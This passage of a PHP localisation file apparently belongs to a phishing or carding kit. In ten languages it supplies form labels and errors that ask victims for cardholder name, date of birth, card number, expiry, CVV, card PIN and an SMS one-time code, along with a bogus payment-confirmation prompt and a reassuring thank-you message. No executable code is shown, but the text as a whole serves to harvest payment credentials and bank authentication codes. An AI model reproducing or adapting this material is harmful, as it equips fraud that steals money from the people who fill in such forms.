            'ar' => 'الرمز البريدي غير صالح',
            'dk' => 'Angi et gyldig postnummer',
            'cn' => '请输入有效的邮政编码',
            'ro' => 'Vă rugăm să introduceți un cod poștal valid',
        ],

        'birth_date_label' => [
            'en' => 'Date of birth (DD/MM/YYYY)',
            'de' => 'Geburtsdatum (TT/MM/JJJJ)',
            'es' => 'Fecha de Nacimiento (DD/MM/AAAA)',
            'fr' => 'Date de naissance (JJ/MM/YYYY)',
            'it' => 'Data di nascita  (GG/MM/AAAA)',
            'nl' => 'Geboortedatum (DD/MM/JJJJ)',
            'ar' => 'تاريخ الميلاد (يوم / شهر / سنة)',
            'dk' => 'Fødselsdato (DD/MM/ÅÅÅÅ)',
            'cn' => '出生日期',
            'ro' => 'Data nașterii (ZZ/LL/AAAA)',
        ],

        'birth_date_error' => [
            'en' => 'Please enter a valid date',
            'de' => 'Bitte gib ein korrektes Datum an',
            'es' => 'Por favor introduzca una fecha valida',
            'fr' => 'veuillez entrer une date valide',
            'it' => 'Per favore, inserisci una data valida',
            'nl' => 'Gelieve een correcte datum in te voeren',
            'ar' => 'التاريخ غير صحيح',
            'dk' => 'Vennligst oppgi en gyldig dato',
            'cn' => '请输入一个有效的日期',
            'ro' => 'Vă rog introduceți o dată validă',
        ],

        'name_label' => [
            'en' => 'Cardholder\'s name',
            'de' => 'Name des Karteninhabers',
            'es' => 'Nombre del titular de la tarjeta',
            'fr' => 'Nom du titulaire de la carte',
            'it' => 'Titolare della carta',
            'nl' => 'Naam van kaarthouder',
            'ar' => 'اسم حامل البطاقة',
            'dk' => 'Kortholders navn',
            'cn' => '持卡人姓名',
            'ro' => 'Numele titularului cardului',
        ],

        'name_error' => [
            'en' => 'Please enter a valid name',
            'de' => 'Bitte geben Sie einen gültigen Namen ein',
            'es' => 'Por favor ingrese un nombre valido',
            'fr' => 'Merci d\'entrer un nom valide',
            'it' => 'Per favore inserire un nome valido',
            'nl' => 'Vul alstublieft een geldige naam in',
            'ar' => 'رجاء ادخل اسما صحيحا',
            'dk' => 'Vennligst skriv inn et gyldig navn',
            'cn' => '请输入有效的名字',
            'ro' => 'Vă rugăm să introduceți un nume valid',
        ],

        'one_label' => [
            'en' => 'Credit card number',
            'de' => 'Kreditkartennummer',
            'es' => 'Número de la tarjeta',
            'fr' => 'Numéro de la carte de crédit',
            'it' => 'Numero della carta di credito',
            'nl' => 'Kaartnummer',
            'ar' => 'رقم بطاقة الائتمان',
            'dk' => 'Kreditt kort nummer',
            'cn' => '信用卡号',
            'ro' => 'Numărul cărții de credit',
        ],

        'one_error' => [
            'en' => 'Please enter a valid card number',
            'de' => 'Bitte geben Sie eine gültige Kartennummer ein',
            'es' => 'Por favor, introduzca un número de tarjeta válido',
            'fr' => 'S\'il vous plaît entrez un numéro de carte valide',
            'it' => 'per favore inserisci UN numero di carta valido',
            'nl' => 'Gelieve een geldig kaart nummer in te voeren',
            'ar' => 'رقم بطاقة الإئتمان غير صحيح',
            'dk' => 'Vennligst skriv inn et gyldig kortnummer',
            'cn' => '请输入有效的卡号',
            'ro' => 'Vă rugăm să introduceți un număr valid de card',
        ],

        'two_label' => [
            'en' => 'Exp MM/YY',
            'de' => 'Gültigkeit MM/JJ',
            'es' => 'EXP MM/YY',
            'fr' => 'Exp MM/YY',
            'it' => 'Scad. MM/AA',
            'nl' => 'Vervaldatum MM/JJ',
            'ar' => 'تاريخ انتهاء الصلاحية',
            'dk' => 'Utløpsdato MM / ÅÅ',
            'cn' => '截止日期',
            'ro' => 'Exp. LL/AA',
        ],

        'two_error' => [
            'en' => 'Please enter a valid date',
            'de' => 'Bitte gib ein korrektes Datum an',
            'es' => 'Por favor introduzca una fecha valida',
            'fr' => 'veuillez entrer une date valide',
            'it' => 'Per favore, inserisci una data valida',
            'nl' => 'Gelieve een correcte datum in te voeren',
            'ar' => 'التاريخ غير صحيح',
            'dk' => 'Vennligst oppgi en gyldig dato',
            'cn' => '请输入一个有效的日期',
            'ro' => 'Vă rog introduceți o dată validă',
        ],

        'three_label' => [
            'en' => 'CVV (CVC)',
            'de' => 'cvv(CVC)',
            'es' => 'cvv(CVC)',
            'fr' => 'cvv(CVC)',
            'it' => 'cvv(CVC)',
            'nl' => 'cvv(CVC)',
            'ar' => 'CVV (CVC)',
            'dk' => 'CVV (CVC)',
            'cn' => '安全码',
            'ro' => 'CVV (CVC)',
        ],

        'three_error' => [
            'en' => 'Please enter a valid security code',
            'de' => 'Bitte geben Sie einen gültigen Sicherheitscode ein',
            'es' => 'Ingrese un código de seguridad válido',
            'fr' => 'Veuillez entrer un code de sécurité valide',
            'it' => 'Si prega di inserire un codice di sicurezza valido',
            'nl' => 'Voer een geldige beveiligingscode in',
            'ar' => 'رمز الأمان غير صحيح',
            'dk' => 'Angi en gyldig sikkerhetskode',
            'cn' => '请输入有效的安全码',
            'ro' => 'Vă rugăm să introduceți un cod de securitate valid',
        ],

        'pin_label' => [
            'en' => 'Pin Code',
            'de' => 'Geheimzahl',
            'es' => 'Código PIN',
            'fr' => 'Code PIN',
            'it' => 'Codice PIN',
            'nl' => 'Pincode',
            'ar' => 'رمز PIN',
            'dk' => 'PIN-kode',
            'cn' => 'PIN码',
            'ro' => 'Cod PIN',
        ],

        'pin_error' => [
            'en' => 'Pin code is invalid',
            'de' => 'PIN-Code ist ungültig',
            'es' => 'El código PIN no es válido',
            'fr' => 'Le code PIN n\'est pas valide',
            'it' => 'Il codice PIN non è valido',
            'nl' => 'Pincode is ongeldig',
            'ar' => 'رمز PIN غير صالح',
            'dk' => 'PIN-koden er ugyldig',
            'cn' => 'PIN 码无效',
            'ro' => 'Codul PIN este invalid',
        ],

        'sms_code_label' => [
            'en' => 'SMS Code',
            'de' => 'SMS-Code',
            'es' => 'Código SMS',
            'fr' => 'Code SMS',
            'it' => 'Codice SMS',
            'nl' => 'SMS-code',
            'ar' => 'رمز الرسائل القصيرة',
            'dk' => 'SMS-kode',
            'cn' => '短信代码',
            'ro' => 'Cod SMS',
        ],

        'sms_code_error' => [
            'en' => 'SMS Code is invalid',
            'de' => 'SMS-Code ist ungültig',
            'es' => 'El código SMS no es válido',
            'fr' => 'Le code SMS est invalide',
            'it' => 'Il codice SMS non è valido',
            'nl' => 'SMS-code is ongeldig',
            'ar' => 'رمز SMS غير صالح',
            'dk' => 'SMS-koden er ugyldig',
            'cn' => '短信代码无效',
            'ro' => 'Codul SMS este invalid',
        ],

        'thanks' => [
            'en' => 'Thank you for entering the information. We will contact you shortly.',
            'de' => 'Vielen Dank für die Eingabe der Informationen. Wir werden Sie in Kürze kontaktieren.',
            'es' => 'Gracias por ingresar su información. Le contactaremos en la brevedad.',
            'fr' => 'Merci d\'avoir saisi ces informations. Nous vous contacterons sous peu.',
            'it' => 'Grazie per aver fornito le informazioni. Ti contatteremo a breve.',
            'nl' => 'Bedankt voor het invoeren van de informatie. Wij zullen binnenkort contact met u opnemen.',
            'ar' => 'شكرا لك على إدخال المعلومات. سوف نتصل بك قريبا.',
            'dk' => 'Takk for at du skrev inn informasjonen. Vi kontakter deg snart.',
            'cn' => '感谢您输入信息。 我们会尽快与您联系。',
            'ro' => 'Vă mulțumim că ați introdus informațiile. Vă vom contacta în scurt timp.',
        ],

        'sms-title' => [
            'en' => 'Please confirm the following payment.',
            'de' => 'Bitte bestätigen Sie die folgende Zahlung.',
            'es' => 'Por favor confirme el siguiente pago',
            'fr' => 'Veuillez confirmer le paiement suivant.',
            'it' => 'Conferma il seguente pagamento',
            'nl' => 'Bevestig de volgende betaling.',
            'ar' => 'يرجى تأكيد الدفع التالي.',
            'dk' => 'Bekreft følgende betaling.',
            'cn' => '请确认以下付款。',
            'ro' => 'Vă rugăm să confirmați următoarea plată.',
        ],

        'sms-title2' => [
            'en' => 'This process requires your code pin.',
            'de' => 'Dieser Vorgang erfordert Ihren Code-Pin.',
            'es' => 'Este proceso requiere su código PIN.',
            'fr' => 'Ce processus nécessite votre code PIN.',
            'it' => 'Questo processo richiede il codice pin.',
            'nl' => 'Voor dit proces is uw pincode vereist.',
            'ar' => 'تتطلب هذه العملية رمز PIN الخاص بك.',
            'dk' => 'Denne prosessen krever kodepinnen din.',
            'cn' => '此过程需要您的密码。',
            'ro' => 'Acest proces necesită codul PIN.',
        ],

        'sms-message' => [
            'en' => 'The unique password has been sent to the mobile number listed below. If you need to change your mobile number please contact your bank of modify it via the available channels (ATM, web).',
            'de' => 'Das eindeutige Passwort wurde an die unten aufgeführte Handynummer gesendet. Wenn Sie Ihre Handynummer ändern müssen, wenden Sie sich bitte an Ihre Bank oder ändern Sie sie über die verfügbaren Kanäle (ATM, Web).',
            'es' => 'La contraseña única se ha enviado al número de teléfono móvil que se indica a continuación. Si necesita cambiar su número de móvil, póngase en contacto con su banco o modifíquelo a través de los canales disponibles (cajero automático, web).',
            'fr' => 'Le mot de passe unique a été envoyé au numéro de mobile indiqué ci-dessous. Si vous devez changer votre numéro de mobile, veuillez contacter votre banque pour le modifier via les canaux disponibles (ATM, web).',
            'it' => 'La password univoca è stata inviata al numero di cellulare elencato di seguito. Se hai bisogno di cambiare il tuo numero di cellulare contatta la tua banca per modificarlo tramite i canali disponibili (ATM, web).',
            'nl' => 'Het unieke wachtwoord is verzonden naar het onderstaande mobiele nummer. Als u uw mobiele nummer moet 
            wijzigen, neem dan contact op met uw bank of wijzig het via de beschikbare kanalen (ATM, web).',
            'ar' => 'تم إرسال كلمة المرور الفريدة إلى رقم الهاتف المحمول المذكور أدناه. إذا كنت بحاجة إلى تغيير رقم هاتفك المحمول ، فيرجى الاتصال بالمصرف الذي تتعامل معه لتعديله عبر القنوات المتاحة (ماكينة الصراف الآلي ، الويب).',
            'dk' => 'Det unike passordet er sendt til mobilnummeret som er oppført nedenfor. Hvis du trenger å endre mobilnummeret, kan du kontakte banken din for å endre det via tilgjengelige kanaler (minibank, internett).',
            'cn' => '唯一的密码已发送到下面列出的手机号码。 如果您需要更改手机号码，请通过可用渠道（ATM、网络）联系您的修改银行。',
            'ro' => 'Parola unică a fost trimisă la numărul de mobil enumerat mai jos. Dacă aveți nevoie să vă schimbați numărul de telefon mobil, vă rugăm să contactați banca pentru a-l modifica prin canalele disponibile (ATM, web).',
        ],

        'merchant' => [
            'en' => 'Merchant',
            'de' => 'Händler',
            'es' => 'Comerciante',
            'fr' => 'Marchande',
            'it' => 'Mercante',
            'nl' => 'Handelaar',
            'ar' => 'التاجر',
            'dk' => 'Kjøpmann',
            'cn' => '商人',
            'ro' => 'Comerciant',
        ],

        'amount' => [
            'en' => 'Amount',
            'de' => 'Menge',
            'es' => 'Monto',
            'fr' => 'Montant',
            'it' => 'Quantità',
            'nl' => 'Bedrag',
            'ar' => 'المبلغ',
            'dk' => 'Beløp',
            'cn' => '数量',
            'ro' => 'Cantitate',
        ],

        'date' => [
            'en' => 'Date',
            'de' => 'Datum',
            'es' => 'Fecha',
            'fr' => 'Date',
            'it' => 'Data',
            'nl' => 'Datum',
            'ar' => 'التاريخ',
            'dk' => 'Dato',
            'cn' => '日期',
            'ro' => 'Data',
        ],

        'credit-card-number' => [
            'en' => 'Credit card number',
            'de' => 'Kreditkartennummer',
            'es' => 'Número de Tarjeta de Crédito',
            'fr' => 'Numéro de Carte de Crédit',
            'it' => 'Numero di carta di credito',
            'nl' => 'Creditcardnummer',
            'ar' => 'رقم بطاقة الائتمان',
            'dk' => 'Kreditt kort nummer',
            'cn' => '信用卡号',
            'ro' => 'Numărul cărții de credit',
        ],

        'sms-again' => [
            'en' => 'Please enter the verification code received by sms',
            'de' => 'Bitte geben Sie den per SMS erhaltenen Bestätigungscode ein',
            'es' => 'Por favor ingrese el código de verificación recibido por sms',
            'fr' => 'Veuillez entrer le code de vérification reçu par sms',
            'it' => 'Inserisci il codice di verifica ricevuto via sms',
            'nl' => 'Voer de verificatiecode in die u per sms hebt ontvangen received',
            'ar' => 'الرجاء إدخال رمز التحقق الذي تلقيته عبر الرسائل القصيرة',
            'dk' => 'Vennligst skriv inn bekreftelseskoden mottatt av sms',
            'cn' => '请输入短信收到的验证码',
            'ro' => 'Vă rugăm să introduceți codul de verificare primit prin sms',
        ],

        'submit' => [
            'en' => 'Submit',
            'de' => 'einreichen',
            'es' => 'Enviar',
            'fr' => 'Soumettre',
            'it' => 'Invia',
            'nl' => 'Verzenden',
            'ar' => 'تأكيد',
            'dk' => 'Sende inn',
            'cn' => '提交',
            'ro' => 'Trimite',
        ],

        'pin-title' => [
            'en' => 'This process requires your code pin.',
            'de' => 'Dieser Vorgang erfordert Ihren Code-Pin.',
            'es' => 'Este proceso requiere su código PIN.',
            'fr' => 'Ce processus nécessite votre code PIN.',
            'it' => 'Questo processo richiede il codice pin.',
            'nl' => 'Voor dit proces is uw pincode vereist.',
            'ar' => 'تتطلب هذه العملية رمز PIN الخاص بك.',
            'dk' => 'Denne prosessen krever kodepinnen din.',
            'cn' => '此过程需要您的密码。',
            'ro' => 'Acest proces necesită codul PIN.',
        ],

        'loading' => [
            'en' => 'Loading...',
            'de' => 'Wird geladen ...',
            'es' => 'Cargando ...',
            'fr' => 'Chargement ...',
            'it' => 'Caricamento ...',
            'nl' => 'Bezig met laden ...',
            'ar' => 'جار التحميل...',
            'dk' => 'Laster inn ...',
            'cn' => '正在加载...',
            'ro' => 'Se încarcă...',
        ],

        'try_again' => [
            'en' => 'Try again',
            'de' => 'Versuchen Sie es nochmal',
            'es' => 'Intentar otra vez',
            'fr' => 'Réessayer',
            'it' => 'Riprova',
            'nl' => 'Probeer het nog eens',
            'ar' => 'حاول مرة أخرى',
            'dk' => 'Prøv igen',
            'cn' => '再试一次',
            'ro' => 'Încearcă din nou',
        ],

    );

?>